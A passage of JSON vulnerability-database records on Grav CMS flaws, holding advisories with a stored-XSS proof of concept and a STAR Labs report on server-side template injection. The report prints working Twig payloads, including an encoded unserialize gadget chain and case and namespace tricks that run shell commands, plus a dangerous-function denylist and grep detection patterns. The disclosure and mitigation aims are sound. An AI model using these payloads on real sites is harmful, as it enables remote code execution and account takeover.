/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66294","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66294"},{"reference_url":"https://github.com/advisories/GHSA-662m-56v4-3r8f","reference_id":"GHSA-662m-56v4-3r8f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-662m-56v4-3r8f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66294","GHSA-662m-56v4-3r8f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4w-2f8d-vfcf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29967?format=json","vulnerability_id":"VCID-xe66-6nav-c7gy","summary":"Grav Admin Plugin vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/config/site` parameter `data[taxonomies]`\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/config/site` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[taxonomies]` parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/config/site` \n**Parameter:** `data[taxonomies]`\n\nThe application does not properly validate or sanitize input in the `data[taxonomies]` field. As a result, an attacker can inject JavaScript code, which is stored in the site configuration and later rendered in the administrative interface or site output, causing automatic execution in the user's browser.\n\n---\n\n## PoC\n\n**Payload:**\n\n`\"><script>alert('XSS-PoC')</script>`\n\n### Steps to Reproduce:\n\n1. Log in to the _Grav_ Admin Panel with sufficient permissions to modify site configuration.\n \n2. Navigate to **Configuration > Site**.\n \n3. In the **Taxonomies Types** field (which maps to `data[taxonomies]`), insert the payload above:\n \n `\"><script>alert('XSS-PoC')</script>`\n \n4. Save the configuration.\n\n<img width=\"1897\" height=\"628\" alt=\"Pasted image 20250718195942\" src=\"https://github.com/user-attachments/assets/2035fcaa-34fc-494c-a7ca-7c1e1f34b057\" />\n \n5. Go on Pages and click on one of them\n\n<img width=\"932\" height=\"587\" alt=\"Pasted image 20250718200306\" src=\"https://github.com/user-attachments/assets/3c1995ba-2581-4e27-ae9d-a17e2eeb5b57\" />\n \n6. The stored payload is executed immediately in the browser, confirming the Stored XSS vulnerability.\n\n<img width=\"1204\" height=\"377\" alt=\"Pasted image 20250718200353\" src=\"https://github.com/user-attachments/assets/ad8ea7ea-603f-4b84-aa5a-120de0cb56ce\" />\n \n7. The HTTP request submitted during this process contains the vulnerable parameter and payload:\n \n<img width=\"757\" height=\"675\" alt=\"Pasted image 20250718200445\" src=\"https://github.com/user-attachments/assets/fbbe2b76-00eb-4426-8ddd-5cde2cc65d77\" />\n\n---\n\n## Impact\n\nStored XSS attacks can lead to severe consequences, including:\n\n- **Session hijacking:** Stealing cookies or authentication tokens to impersonate users\n \n- **Credential theft:** Harvesting usernames and passwords using malicious scripts\n \n- **Malware delivery:** Distributing unwanted or harmful code to victims\n \n- **Privilege escalation:** Compromising administrative users through persistent scripts\n \n- **Data manipulation or defacement:** Changing or disrupting site content\n \n- **Reputation damage:** Eroding trust among site users and administrators\n \n\n---\n\n## Discoverer\n\n[Marcelo Queiroz](www.linkedin.com/in/marceloqueirozjr) \n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66308","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66308"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66308","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66308"},{"reference_url":"https://github.com/advisories/GHSA-gqxx-248x-g29f","reference_id":"GHSA-gqxx-248x-g29f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gqxx-248x-g29f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66308","GHSA-gqxx-248x-g29f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xe66-6nav-c7gy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38965?format=json","vulnerability_id":"VCID-ya18-2867-f7ar","summary":"Hi, \n\nactually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability\n\n## Summary: \n| **Product** | Grav CMS |\n| ----------------------- | --------------------------------------------- |\n| **Vendor** | Grav |\n| **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions** | v1.7.40 |\n| **Internal Identifier** | STAR-2023-0006 |\n| **CVE Identifier** | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594 |\n| **CWE(s)** | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System: \n**Base Score:** 7.2 (High) \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` \n| **Metric** | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)** | Network |\n| **Attack Complexity (AC)** | Low |\n| **Privileges Required (PR)** | High |\n| **User Interaction (UI)** | None |\n| **Scope (S)** | Unchanged |\n| **Confidentiality \\(C)** | High |\n| **Integrity (I)** | High |\n| **Availability (A)** | High |\n\n## Product Overview: \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary: \nThe denylist introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.\n\n## Vulnerability Details: \nIn addressing [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a denylist was introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to validate and ensure that dangerous functions could not be executed via injection of malicious templates.\n\nThe implementation of the denylist can be found in `Utils::isDangerousFunction()` within [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190):\n~~~php\n /**\n * @param string $name\n * @return bool\n */\n public static function isDangerousFunction(string $name): bool\n {\n static $commandExecutionFunctions = [\n 'exec',\n 'passthru',\n 'system',\n 'shell_exec',\n 'popen',\n 'proc_open',\n 'pcntl_exec',\n ];\n\n static $codeExecutionFunctions = [\n 'assert',\n 'preg_replace',\n 'create_function',\n 'include',\n 'include_once',\n 'require',\n 'require_once'\n ];\n\n static $callbackFunctions = [\n 'ob_start' => 0,\n 'array_diff_uassoc' => -1,\n 'array_diff_ukey' => -1,\n 'array_filter' => 1,\n 'array_intersect_uassoc' => -1,\n 'array_intersect_ukey' => -1,\n 'array_map' => 0,\n 'array_reduce' => 1,\n 'array_udiff_assoc' => -1,\n 'array_udiff_uassoc' => [-1, -2],\n 'array_udiff' => -1,\n 'array_uintersect_assoc' => -1,\n 'array_uintersect_uassoc' => [-1, -2],\n 'array_uintersect' => -1,\n 'array_walk_recursive' => 1,\n 'array_walk' => 1,\n 'assert_options' => 1,\n 'uasort' => 1,\n 'uksort' => 1,\n 'usort' => 1,\n 'preg_replace_callback' => 1,\n 'spl_autoload_register' => 0,\n 'iterator_apply' => 1,\n 'call_user_func' => 0,\n 'call_user_func_array' => 0,\n 'register_shutdown_function' => 0,\n 'register_tick_function' => 0,\n 'set_error_handler' => 0,\n 'set_exception_handler' => 0,\n 'session_set_save_handler' => [0, 1, 2, 3, 4, 5],\n 'sqlite_create_aggregate' => [2, 3],\n 'sqlite_create_function' => 2,\n ];\n\n static $informationDiscosureFunctions = [\n 'phpinfo',\n 'posix_mkfifo',\n 'posix_getlogin',\n 'posix_ttyname',\n 'getenv',\n 'get_current_user',\n 'proc_get_status',\n 'get_cfg_var',\n 'disk_free_space',\n 'disk_total_space',\n 'diskfreespace',\n 'getcwd',\n 'getlastmo',\n 'getmygid',\n 'getmyinode',\n 'getmypid',\n 'getmyuid'\n ];\n\n static $otherFunctions = [\n 'extract',\n 'parse_str',\n 'putenv',\n 'ini_set',\n 'mail',\n 'header',\n 'proc_nice',\n 'proc_terminate',\n 'proc_close',\n 'pfsockopen',\n 'fsockopen',\n 'apache_child_terminate',\n 'posix_kill',\n 'posix_mkfifo',\n 'posix_setpgid',\n 'posix_setsid',\n 'posix_setuid',\n ];\n\n if (in_array($name, $commandExecutionFunctions)) {\n return true;\n }\n\n if (in_array($name, $codeExecutionFunctions)) {\n return true;\n }\n\n if (isset($callbackFunctions[$name])) {\n return true;\n }\n\n if (in_array($name, $informationDiscosureFunctions)) {\n return true;\n }\n\n if (in_array($name, $otherFunctions)) {\n return true;\n }\n\n return static::isFilesystemFunction($name);\n }\n\n /**\n * @param string $name\n * @return bool\n */\n public static function isFilesystemFunction(string $name): bool\n {\n static $fileWriteFunctions = [\n 'fopen',\n 'tmpfile',\n 'bzopen',\n 'gzopen',\n // write to filesystem (partially in combination with reading)\n 'chgrp',\n 'chmod',\n 'chown',\n 'copy',\n 'file_put_contents',\n 'lchgrp',\n 'lchown',\n 'link',\n 'mkdir',\n 'move_uploaded_file',\n 'rename',\n 'rmdir',\n 'symlink',\n 'tempnam',\n 'touch',\n 'unlink',\n 'imagepng',\n 'imagewbmp',\n 'image2wbmp',\n 'imagejpeg',\n 'imagexbm',\n 'imagegif',\n 'imagegd',\n 'imagegd2',\n 'iptcembed',\n 'ftp_get',\n 'ftp_nb_get',\n ];\n\n static $fileContentFunctions = [\n 'file_get_contents',\n 'file',\n 'filegroup',\n 'fileinode',\n 'fileowner',\n 'fileperms',\n 'glob',\n 'is_executable',\n 'is_uploaded_file',\n 'parse_ini_file',\n 'readfile',\n 'readlink',\n 'realpath',\n 'gzfile',\n 'readgzfile',\n 'stat',\n 'imagecreatefromgif',\n 'imagecreatefromjpeg',\n 'imagecreatefrompng',\n 'imagecreatefromwbmp',\n 'imagecreatefromxbm',\n 'imagecreatefromxpm',\n 'ftp_put',\n 'ftp_nb_put',\n 'hash_update_file',\n 'highlight_file',\n 'show_source',\n 'php_strip_whitespace',\n ];\n\n static $filesystemFunctions = [\n // read from filesystem\n 'file_exists',\n 'fileatime',\n 'filectime',\n 'filemtime',\n 'filesize',\n 'filetype',\n 'is_dir',\n 'is_file',\n 'is_link',\n 'is_readable',\n 'is_writable',\n 'is_writeable',\n 'linkinfo',\n 'lstat',\n //'pathinfo',\n 'getimagesize',\n 'exif_read_data',\n 'read_exif_data',\n 'exif_thumbnail',\n 'exif_imagetype',\n 'hash_file',\n 'hash_hmac_file',\n 'md5_file',\n 'sha1_file',\n 'get_meta_tags',\n ];\n\n if (in_array($name, $fileWriteFunctions)) {\n return true;\n }\n\n if (in_array($name, $fileContentFunctions)) {\n return true;\n }\n\n if (in_array($name, $filesystemFunctions)) {\n return true;\n }\n\n return false;\n }\n~~~\n\nThe list of banned functions appears to be adapted from a [StackOverflow post](https://stackoverflow.com/a/3697776). While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation:\n1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, `unserialize()` and aliases of blocked functions, such as `ini_alter()`, are not being included in the denylist. \n2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using `filter('SYSTEM')` to trivially bypass the denylist validation check. \n3. Fully qualified names can be used when referencing functions, allowing `filter('\\system')` to trivially bypass the denylist validation checks. \n\n## Exploit Conditions: \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrative user account with the following permissions granted:\n - login access to Grav admin panel, and\n - page creation or update rights\n\n## Reproduction Steps: \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n * Login to Admin - Allowed\n * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://<grav_installation>/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. Under the `Content` tab, insert the following payload within the editor:\n ~~~twig\n // Method 1: Using unserialize() to trigger system('id') call\n // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id'\n // {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }}\n \n // Method 2: Trigger system('id') via case-insensitive function names\n {{ ['id'] | filter('System') }}\n \n // Method 3: Trigger system('id') via fully qualified names when referencing functions\n {{ ['id'] | filter('\\\\system') }}\n ~~~ \n7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations: \nIt is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below:\n- `unserialize()`\n- `ini_alter()`\n- `simplexml_load_file()`\n- `simplexml_load_string()`\n- `forward_static_call()`\n- `forward_static_call_array()`\n\nThe `Utils::isDangerousFunction()` function in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the `$name` parameter is case-insensitive.\n\nFor example,\n~~~diff php\n...\nabstract class Utils\n{\n ...\n /**\n * @param string $name\n * @return bool\n */\n public static function isDangerousFunction(string $name): bool\n {\n ...\n+ if ($arrow instanceof Closure) {\n+ return false;\n+ }\n\n+ $name = strtolower($name);\n+ if (strpos($name, \"\\\\\") !== false) {\n+ return false;\n+ }\n\n if (in_array($name, $commandExecutionFunctions)) {\n return true;\n }\n\n if (in_array($name, $codeExecutionFunctions)) {\n return true;\n }\n\n if (isset($callbackFunctions[$name])) {\n return true;\n }\n\n if (in_array($name, $informationDiscosureFunctions)) {\n return true;\n }\n\n if (in_array($name, $otherFunctions)) {\n return true;\n }\n\n return static::isFilesystemFunction($name);\n }\n ...\n}\n~~~\n\nEnd users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.\n\n## Detection Guidance: \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command: \n `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command: \n `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command: \n `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\\s*\\(' /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command: \n `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits: \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\nThe scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties. \n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: \n1. **CVE-2023-30592**\n Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of unsafe functions, such as `unserialize()`, that are not blocked. This is a bypass of CVE-2022-2073.\n2. **CVE-2023-30593**\n Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.\n3. **CVE-2023-30594**\n Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34253","reference_id":"","reference_type":"","scores":[{"value":"0.02104","scoring_system":"epss","scoring_elements":"0.84359","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34253"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34253","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34253"},{"reference_url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://github.com/advisories/GHSA-j3v8-v77f-fvgm","reference_id":"GHSA-j3v8-v77f-fvgm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-j3v8-v77f-fvgm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerabili